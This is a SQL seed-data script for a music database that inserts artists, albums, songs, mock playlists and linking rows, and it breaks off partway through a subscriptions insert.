insert into artists (artistsname, image_id, description) values ('Joy Division', 27, 'Joy Division were an English rock band formed in Salford in 1976. The group consisted of vocalist <NAME>, guitarist/keyboardist <NAME>, bassist <NAME> and drummer <NAME>.');
insert into artists (artistsname, image_id, description) values ('Fontaines D.C.', 28, 'Fontaines D.C. are an Irish post-punk revival band formed in Dublin in 2017.The band consists of <NAME> (vocals), <NAME> (guitar), <NAME> (guitar), <NAME> III (bass), and <NAME> (drums).');
insert into artists (artistsname, image_id, description) values ('<NAME>', 29, '<NAME> (January 19, 1943 – October 4, 1970) was an American singer-songwriter who sang rock, soul and blues music. One of the most successful and widely known rock stars of her era, she was noted for her powerful mezzo-soprano vocals and "electric" stage presence.');
insert into artists (artistsname, image_id, description) values ('Kyuss', 30, 'Kyuss was an American rock band, formed in Palm Desert, California in 1987. The band disbanded in 1995, and since then, members of Kyuss have gone on to form or play in several notable bands including Queens of the Stone Age, Fu Manchu, Dwarves, Eagles of Death Metal, Mondo Generator, Hermano, Unida, Slo Burn and Them Crooked Vultures.');
insert into artists (artistsname, image_id, description) values ('Queens of the Stone Age', 31, 'Queens of the Stone Age (commonly abbreviated QOTSA) is an American rock band formed in 1996 in Palm Desert, California. The band was founded by vocalist and guitarist <NAME>, who has been the only constant member throughout multiple line-up changes. The current line-up consists of Homme alongside <NAME> (guitar, lap steel, keyboard, percussion, backing vocals), <NAME> (bass guitar, keyboard, backing vocals), <NAME> (keyboards, guitar, percussion, backing vocals), and <NAME> (drums, percussion).');
insert into artists (artistsname, image_id, description) values ('Metallica', 32, 'Metallica is an American heavy metal band. The band was formed in 1981 in Los Angeles by vocalist/guitarist <NAME> and drummer Lars Ulrich, and has been based in San Francisco for most of its career.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 33, '<NAME> (14 September 1983 – 23 July 2011) was an English singer and songwriter. She was known for her deep, expressive contralto vocals and her eclectic mix of musical genres, including soul, rhythm and blues and jazz.');
insert into artists (artistsname, image_id, description) values ('Heart', 34, 'Heart is an American rock band formed in 1970 in Seattle, Washington, by <NAME> (bass guitar), <NAME> (guitar), <NAME> (keyboards), and <NAME> (drums). It evolved from an existing band, White Heart. The vocalists for Heart are sisters <NAME> (lead vocals, flute, guitar) and <NAME> (vocals, guitar, mandolin).');
insert into artists (artistsname, image_id, description) values ('The Cranberries', 35, 'The Cranberries were an Irish rock band formed in Limerick, Ireland, in 1989 by lead singer <NAME>, guitarist <NAME>, bassist <NAME>, and drummer <NAME>. Quinn was replaced as lead singer by <NAME> in 1990. The band officially classified themselves as an alternative rock group, but incorporated aspects of indie pop, post-punk, folk rock, and pop rock into their sound.');
insert into artists (artistsname, image_id, description) values ('Adele', 36, '<NAME> MBE (born 5 May 1988), is an English singer-songwriter.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 37, '<NAME> (born January 25, 1981), known professionally as <NAME>, is an American singer-songwriter. A classically-trained pianist, Keys began composing songs by age 12 and was signed at 15 years old by Columbia Records. ');
insert into artists (artistsname, image_id, description) values ('Evanescence', 38, 'Evanescence is an American rock band founded in Little Rock, Arkansas, in 1995 by singer and pianist <NAME> and guitarist <NAME>. After recording independent albums, the band released their first full-length album, Fallen, on Wind-up Records in 2003.');
insert into artists (artistsname, image_id, description) values ('<NAME>', 39, '<NAME> (born June 21, 1985), known by her stage name <NAME>, is an American singer-songwriter. Her music is noted for its stylized, cinematic quality; themes of sadness, tragic romance, glamor, and melancholia; and references to pop culture, particularly 1950s and 1960s Americana.');
insert into artists (artistsname, image_id, description) values ('Blondie', 40, 'Blondie is an American rock band co-founded by singer <NAME> and guitarist <NAME>. The band were pioneers in the American punk and then the new wave scene of the mid-1970s in New York. ');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Unknown Pleasures', 'https://robohash.org/temporeinventoreincidunt.bmp?size=50x50&set=set1', 1979, 'Post-punk');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Closer', 'https://robohash.org/optionemoaut.bmp?size=50x50&set=set1', 1980, 'Post-punk');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('A Hero\'s Death', 'https://robohash.org/reiciendissolutasuscipit.bmp?size=50x50&set=set1', 2020, 'Post-punk');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Dogrel', 'https://robohash.org/totammollitiaexplicabo.png?size=50x50&set=set1', 2019, 'Post-punk');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Pearl', 'https://robohash.org/dolorlaborumest.bmp?size=50x50&set=set1', 1971, 'Blues rock');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Welcome to Sky Valley', 'https://robohash.org/adharumpossimus.png?size=50x50&set=set1', 1994, 'Stoner rock');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Metallica', 'https://robohash.org/hicitaquein.jpg?size=50x50&set=set1', 1991, 'Heavy metal');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Back to Black', 'https://robohash.org/consequunturmagnamquaerat.bmp?size=50x50&set=set1', 2006, 'Soul/R&B');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('21', 'https://robohash.org/occaecatiquiavoluptas.jpg?size=50x50&set=set1', 2011, 'Soul');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('25', 'https://robohash.org/estsitut.jpg?size=50x50&set=set1', 2015, 'Soul');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Born to Die', 'https://robohash.org/necessitatibusnobismodi.png?size=50x50&set=set1', 2012, 'Alternative pop');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Songs in A Minor', 'https://robohash.org/consequaturquidemdeleniti.png?size=50x50&set=set1', 2001, 'Neo soul');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('The Doors', 'https://robohash.org/animisintiste.bmp?size=50x50&set=set1', 1967, 'Rock');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Strange Days', 'https://robohash.org/sedreprehenderitsed.bmp?size=50x50&set=set1', 1967, 'Psychedelic rock');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Waiting for the Sun', 'https://robohash.org/laudantiumsedofficia.bmp?size=50x50&set=set1', 1968, 'Rock');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('Morrison Hotel', 'https://robohash.org/quasidignissimosodio.bmp?size=50x50&set=set1', 1970, 'Psychedelic rock');
insert into albums (albumname, coverimage, yearofrelease, genre) values ('The Diary of Alicia Keys', 'https://robohash.org/autaccusamuset.jpg?size=50x50&set=set1', 2003, 'Soul/R&B');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Dead Souls', 1, 1, '4:25','Elit.mp3', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('The Only Mistake', 1, 2, '4:12','QuamFringilla.ppt', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Insight', 1, 3, '3:52','SociisNatoquePenatibus.avi', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Candidate', 1, 4, '2:08','Ultrices.mp3', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Wilderness', 1, 5, '2:32','MassaVolutpatConvallis.ppt', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('She\'s Lost Control', 1, 6, '3:35','Eleifend.mpeg', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Shadowplay', 1, 7, '3:29','NullaElitAc.ppt', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Disorder', 1, 8, '3:29','Maecenas.png', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Interzone', 1, 9, '2:05','Eleifend.txt', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Atrocity Exhibition', 1, 10, '6:14','VestibulumQuam.xls', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Novelty', 1, 11, '4:28','ParturientMontesNascetur.tiff', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Transmission', 1, 12, '3:50','Pellentesque.doc', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Rolling in the Deep', 9, 1, '3:49','Amet.tiff', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Rumour Has It', 9, 2, '3:43','ImperdietNullamOrci.txt', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Turning Tables', 9, 3, '4:10','RutrumNeque.ppt', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Don\'t You Remember', 9, 4, '4:03','Libero.tiff', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Set Fire to the Rain', 9, 5, '4:01','VelitVivamus.ppt', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('He Won\'t Go', 9, 6, '4:37','InPorttitorPede.ppt', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Take It All', 9, 7, '3:48','Donec.ppt', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('I\'ll Be Waiting', 9, 8, '4:01','AmetSapien.tiff', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('One and Only', 9, 9, '5:48','Lectus.avi', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Lovesong', 9, 10, '5:16','LuctusTinciduntNulla.doc', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Someone like You', 9, 11, '4:45','TortorId.mp3', 'Soul/Pop');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('I Don\'t Belong', 3, 1, '4:31','Congue.png', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Love Is the Main Thing', 3, 2, '3:53','Erat.avi', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Televised Mind', 3, 3, '4:10','MetusAeneanFermentum.jpeg', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('A Lucid Dream', 3, 4, '3:53','AliquamAugue.pdf', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('You Said', 3, 5, '4:36','CondimentumNeque.doc', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Oh, Such a Spring', 3, 6, '2:32','Mauris.xls', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('A Hero\'s Death', 3, 7, '4:18','Aliquet.mp3', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Living in America', 3, 8, '4:56', 'PretiumNislUt.xls', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('I Was Not Born', 3, 9, '3:50', 'FaucibusOrciLuctus.ppt', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Sunny', 3, 10, '4:52', 'Potenti.avi', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('No', 3, 11, '5:08', 'Eros.mp3', 'Post-punk');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Gardenia', 6, 1, '6:54', 'ElitAcNulla.doc', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Asteroid', 6, 2, '4:49', 'NisiEu.ppt', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Supa Scoopa and Mighty Scoop', 6, 3, '6:04', 'SemperInterdumMauris.xls', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('100°', 6, 4, '2:29', 'Purus.png', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Space Cadet', 6, 5, '7:02', 'NullaDapibusDolor.gif', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Demon Cleaner', 6, 6, '5:19', 'Tristique.avi', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Odyssey', 6, 7, '4:19', 'Quisque.png', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('<NAME>', 6, 8, '2:12', 'LacusMorbiSem.png', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('N.O', 6, 9, '3:47', 'Erat.xls', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Whitewater', 6, 10, '8:00', 'Nulla.avi', 'Stoner rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Move Over', 5, 1, '3:39', 'Dolor.png', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Cry Baby', 5, 2, '3:55', 'SapienPlacerat.mp3', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('A Woman Left Lonely', 5, 3, '3:27', 'Odio.mp3', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Half Moon', 5, 4, '3:51', 'SedSagittis.jpeg', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Buried Alive in the Blues', 5, 5, '2:24', 'Varius.xls', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('My Baby', 5, 6, '3:44', 'Vel.mp3', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Me and <NAME>', 5, 7, '4:29', 'IdPretium.avi', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('<NAME>', 5, 8, '1:46', 'Vivamus.txt', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Trust Me', 5, 9, '3:15', 'OdioElementum.ppt', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Get It While You Can', 5, 10, '3:23', 'Odio.png', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Break On Through (To the Other Side)', 13, 1, '2:25', 'AmetEleifendPede.ppt', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Soul Kitchen', 13, 2, '3:30', 'UtTellus.avi', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('The Crystal Ship', 13, 3, '2:30', 'MaurisVulputate.xls', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Twentieth Cent<NAME>', 13, 4, '2:30', 'IdTurpis.mp3', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Alabama Song (Whisky Bar)', 13, 5, '3:15', 'VestibulumQuam.mp3', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Light My Fire', 13, 6, '6:50', 'PorttitorLoremId.mp3', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Back Door Man', 13, 7, '3:30', 'ArcuAdipiscing.avi', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('I Looked at You', 13, 8, '2:18', 'IdMauris.tiff', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('End of the Night', 13, 9, '2:49', 'AtFeugiat.tiff', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Take It as It Comes', 13, 10, '2:13', 'Vel.mp3', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('The End', 13, 11, '11:35', 'Pede.avi', 'Rock');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Reed Therapeutics Pain Relieving Therapy', 'http://dummyimage.com/166x196.png/ff4444/ffffff', 'Reed Therapeutics', 1, '2020-11-20 11:39:42');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('<NAME>', 'http://dummyimage.com/161x115.jpg/ff4444/ffffff', 'Citron Pharma LLC', 2, '2020-04-29 21:38:43');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Lidocaine Hydrochloride', 'http://dummyimage.com/198x171.png/dddddd/000000', 'Hospira, Inc.', 3, '2020-08-07 13:16:31');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Firebush/Burning Bush', 'http://dummyimage.com/114x148.jpg/dddddd/000000', 'Nelco Laboratories, Inc.', 4, '2020-08-28 01:03:32');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Amitriptyline Hydrochloride', 'http://dummyimage.com/181x219.png/5fa2dd/ffffff', 'Aidarex Pharmaceuticals LLC', 5, '2020-04-20 21:57:53');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Metoprolol Tartrate', 'http://dummyimage.com/143x247.png/ff4444/ffffff', 'Mylan Institutional Inc.', 6, '2020-11-04 08:36:42');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Lodosyn', 'http://dummyimage.com/214x225.bmp/dddddd/000000', 'Aton Pharma, Inc', 7, '2020-04-22 03:35:18');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Fluorouracil', 'http://dummyimage.com/120x111.jpg/5fa2dd/ffffff', 'Oceanside Pharmaceuticals', 8, '2020-09-24 10:37:34');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Adempas', 'http://dummyimage.com/131x113.bmp/dddddd/000000', 'Bayer HealthCare Pharmaceuticals Inc.', 9, '2020-01-11 13:13:48');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('<NAME>', 'http://dummyimage.com/101x126.jpg/ff4444/ffffff', 'Reckitt Benckiser LLC', 10, '2020-05-09 06:05:28');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('OxyContin', 'http://dummyimage.com/154x153.jpg/ff4444/ffffff', 'Bryant Ranch Prepack', 11, '2020-02-07 08:32:57');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('California Mugwort', 'http://dummyimage.com/232x175.png/cc0000/ffffff', 'Nelco Laboratories, Inc.', 12, '2020-10-02 02:27:59');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('<NAME>', 'http://dummyimage.com/234x163.png/dddddd/000000', 'Natural Creations, Inc.', 13, '2020-03-16 02:24:48');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('<NAME>', 'http://dummyimage.com/250x120.bmp/5fa2dd/ffffff', 'REMEDYREPACK INC.', 14, '2020-04-12 21:14:20');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('MINERALIZE', 'http://dummyimage.com/245x162.bmp/5fa2dd/ffffff', 'MAKEUP ART COSMETICS', 15, '2020-05-15 08:32:00');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Codfish', 'http://dummyimage.com/170x229.png/cc0000/ffffff', 'Nelco Laboratories, Inc.', 16, '2020-12-14 13:07:39');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('<NAME>', 'http://dummyimage.com/199x208.jpg/cc0000/ffffff', 'Mylan Pharmaceuticals Inc.', 17, '2019-12-22 12:15:38');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('H E B', 'http://dummyimage.com/184x176.png/ff4444/ffffff', 'HEB', 18, '2020-10-20 04:32:25');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Bupropion Hydrochloride', 'http://dummyimage.com/221x167.jpg/cc0000/ffffff', 'Dispensing Solutions, Inc.', 19, '2020-04-12 15:35:33');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Donepezil Hydrochloride', 'http://dummyimage.com/181x119.jpg/cc0000/ffffff', 'Aurobindo Pharma Limited', 20, '2020-02-26 13:48:49');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('FAMCICLOVIR', 'http://dummyimage.com/125x192.png/dddddd/000000', 'Apotex Corp.', 21, '2020-03-05 14:02:59');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Simvastatin', 'http://dummyimage.com/231x225.bmp/5fa2dd/ffffff', 'McKesson Contract Packaging', 22, '2020-04-12 21:50:48');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('<NAME>', 'http://dummyimage.com/155x204.bmp/cc0000/ffffff', '<NAME>', 23, '2020-11-30 08:43:11');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Degree', 'http://dummyimage.com/220x180.png/ff4444/ffffff', 'Conopco Inc. d/b/a Unilever', 24, '2020-07-12 18:38:27');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Penicillium Mixture', 'http://dummyimage.com/166x219.png/dddddd/000000', 'Antigen Laboratories, Inc.', 25, '2020-10-05 04:52:35');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('RITUALS broad spectrum SPF 15 sunscreen matt', 'http://dummyimage.com/152x204.jpg/dddddd/000000', 'Rituals Cosmetics USA, Inc.', 26, '2020-06-26 17:02:38');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Cilostazol', 'http://dummyimage.com/212x185.png/ff4444/ffffff', 'Golden State Medical Supply, Inc.', 27, '2020-07-17 23:45:19');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Bekunis Natures Gentle Laxative Instant Tea', 'http://dummyimage.com/223x133.bmp/cc0000/ffffff', 'roha arzneimittel GmbH', 28, '2020-10-24 08:19:55');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Simcor', 'http://dummyimage.com/150x244.bmp/cc0000/ffffff', 'AbbVie Inc.', 29, '2020-06-25 14:31:33');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Lidocaine Hydrochloride and Hydrocortisone Acetate', 'http://dummyimage.com/130x211.bmp/dddddd/000000', 'Seton Pharmaceuticals', 30, '2020-06-20 13:51:47');
insert into artistsandalbums (album_id, artist_id) values (1, 27);
insert into artistsandalbums (album_id, artist_id) values (2, 27);
insert into artistsandalbums (album_id, artist_id) values (3, 28);
insert into artistsandalbums (album_id, artist_id) values (4, 28);
insert into artistsandalbums (album_id, artist_id) values (5, 29);
insert into artistsandalbums (album_id, artist_id) values (6, 30);
insert into artistsandalbums (album_id, artist_id) values (7, 32);
insert into artistsandalbums (album_id, artist_id) values (8, 33);
insert into artistsandalbums (album_id, artist_id) values (9, 36);
insert into artistsandalbums (album_id, artist_id) values (10, 36);
insert into artistsandalbums (album_id, artist_id) values (11, 39);
insert into artistsandalbums (album_id, artist_id) values (12, 37);
insert into artistsandalbums (album_id, artist_id) values (13, 26);
insert into artistsandalbums (album_id, artist_id) values (14, 26);
insert into artistsandalbums (album_id, artist_id) values (15, 26);
insert into artistsandalbums (album_id, artist_id) values (16, 26);
insert into artistsandalbums (album_id, artist_id) values (17, 37);
insert into songperformers (song_id, artist_id) values (1, 27);
insert into songperformers (song_id, artist_id) values (2, 27);
insert into songperformers (song_id, artist_id) values (3, 27);
insert into songperformers (song_id, artist_id) values (4, 27);
insert into songperformers (song_id, artist_id) values (5, 27);
insert into songperformers (song_id, artist_id) values (6, 27);
insert into songperformers (song_id, artist_id) values (7, 27);
insert into songperformers (song_id, artist_id) values (8, 27);
insert into songperformers (song_id, artist_id) values (9, 27);
insert into songperformers (song_id, artist_id) values (10, 27);
insert into songperformers (song_id, artist_id) values (11, 27);
insert into songperformers (song_id, artist_id) values (12, 27);
insert into songperformers (song_id, artist_id) values (13, 36);
insert into songperformers (song_id, artist_id) values (14, 36);
insert into songperformers (song_id, artist_id) values (15, 36);
insert into songperformers (song_id, artist_id) values (16, 36);
insert into songperformers (song_id, artist_id) values (17, 36);
insert into songperformers (song_id, artist_id) values (18, 36);
insert into songperformers (song_id, artist_id) values (19, 36);
insert into songperformers (song_id, artist_id) values (20, 36);
insert into songperformers (song_id, artist_id) values (21, 36);
insert into songperformers (song_id, artist_id) values (22, 36);
insert into songperformers (song_id, artist_id) values (23, 36);
insert into songperformers (song_id, artist_id) values (24, 28);
insert into songperformers (song_id, artist_id) values (25, 28);
insert into songperformers (song_id, artist_id) values (26, 28);
insert into songperformers (song_id, artist_id) values (27, 28);
insert into songperformers (song_id, artist_id) values (28, 28);
insert into songperformers (song_id, artist_id) values (29, 28);
insert into songperformers (song_id, artist_id) values (30, 28);
insert into songperformers (song_id, artist_id) values (31, 28);
insert into songperformers (song_id, artist_id) values (32, 28);
insert into songperformers (song_id, artist_id) values (33, 28);
insert into songperformers (song_id, artist_id) values (34, 28);
insert into songperformers (song_id, artist_id) values (35, 30);
insert into songperformers (song_id, artist_id) values (36, 30);
insert into songperformers (song_id, artist_id) values (37, 30);
insert into songperformers (song_id, artist_id) values (38, 30);
insert into songperformers (song_id, artist_id) values (39, 30);
insert into songperformers (song_id, artist_id) values (40, 30);
insert into songperformers (song_id, artist_id) values (41, 30);
insert into songperformers (song_id, artist_id) values (42, 30);
insert into songperformers (song_id, artist_id) values (43, 30);
insert into songperformers (song_id, artist_id) values (44, 30);
insert into songperformers (song_id, artist_id) values (45, 29);
insert into songperformers (song_id, artist_id) values (46, 29);
insert into songperformers (song_id, artist_id) values (47, 29);
insert into songperformers (song_id, artist_id) values (48, 29);
insert into songperformers (song_id, artist_id) values (49, 29);
insert into songperformers (song_id, artist_id) values (50, 29);
insert into songperformers (song_id, artist_id) values (51, 29);
insert into songperformers (song_id, artist_id) values (52, 29);
insert into songperformers (song_id, artist_id) values (53, 29);
insert into songperformers (song_id, artist_id) values (54, 29);
insert into songperformers (song_id, artist_id) values (55, 26);
insert into songperformers (song_id, artist_id) values (56, 26);
insert into songperformers (song_id, artist_id) values (57, 26);
insert into songperformers (song_id, artist_id) values (58, 26);
insert into songperformers (song_id, artist_id) values (59, 26);
insert into songperformers (song_id, artist_id) values (60, 26);
insert into songperformers (song_id, artist_id) values (61, 26);
insert into songperformers (song_id, artist_id) values (62, 26);
insert into songperformers (song_id, artist_id) values (63, 26);
insert into songperformers (song_id, artist_id) values (64, 26);
insert into songperformers (song_id, artist_id) values (65, 26);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(39,1,1),
(44,1,4),
(38,1,5),
(8,1,2),
(47,1,6),
(9,1,3),
(45,2,1),
(55,2,2),
(5,2,3),
(28,2,4);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(13,2,5),
(11,3,1),
(21,3,2),
(27,3,3),
(62,5,5),
(29,5,4),
(13,5,6),
(9,5,7),
(35,6,1),
(30,6,2);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(12,7,2),
(55,7,1),
(27,8,5),
(19,8,4),
(9,8,2),
(33,8,3),
(7,8,1),
(14,9,1),
(48,9,2),
(44,10,1);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(11,10,2),
(47,10,4),
(56,10,3),
(55,11,1),
(26,11,2),
(25,11,3),
(12,12,2),
(9,12,1),
(41,12,4),
(59,12,5);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(39,12,3),
(38,13,3),
(1,13,2),
(32,13,4),
(39,13,1),
(45,13,5),
(33,13,6),
(32,14,2),
(51,14,3),
(63,14,1);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(26,15,1),
(34,15,2),
(18,15,3),
(58,15,4),
(58,16,1),
(35,16,2),
(5,17,2),
(4,17,1),
(15,17,3),
(4,18,2);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(17,18,1),
(24,18,3),
(60,18,4),
(12,18,5),
(7,19,1),
(39,19,2),
(8,20,2),
(12,20,3),
(63,20,1),
(44,21,2);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(24,21,1),
(11,22,1),
(43,23,4),
(32,23,1),
(52,23,3),
(63,23,2),
(59,23,5),
(29,24,2),
(3,24,1),
(32,25,2);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(14,25,4),
(49,25,3),
(42,25,1),
(24,26,1),
(57,26,2),
(44,27,3),
(27,27,1),
(13,27,2),
(40,27,4),
(10,28,1);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(16,29,1),
(49,29,2),
(8,29,3),
(4,29,5),
(41,29,4),
(37,30,3),
(55,30,2),
(2,30,4),
(44,30,1);
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(5,22,'1','2020-12-26 04:27:34.0'),
(20,20,'1','2020-12-26 04:27:33.0'),
(24,36,'1','2020-12-26 04:27:34.0'),
(26,14,'1','2020-12-26 04:27:34.0'),
(31,3,'1','2020-12-26 04:27:34.0'),
(32,14,'1','2020-12-26 04:27:34.0'),
(33,15,'1','2020-12-26 04:27:34.0'),
(38,6,'1','2020-12-26 04:27:34.0'),
(40,35,'1','2020-12-26 04:27:34.0'),
(47,2,'1','2020-12-26 04:27:34.0');
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(52,37,'1','2020-12-26 04:27:33.0'),
(54,18,'1','2020-12-26 04:27:33.0'),
(61,18,'1','2020-12-26 04:27:34.0'),
(64,5,'1','2020-12-26 04:27:34.0'),
(66,37,'1','2020-12-26 04:27:34.0'),
(74,36,'1','2020-12-26 04:27:34.0'),
(74,12,'1','2020-12-26 04:27:34.0'),
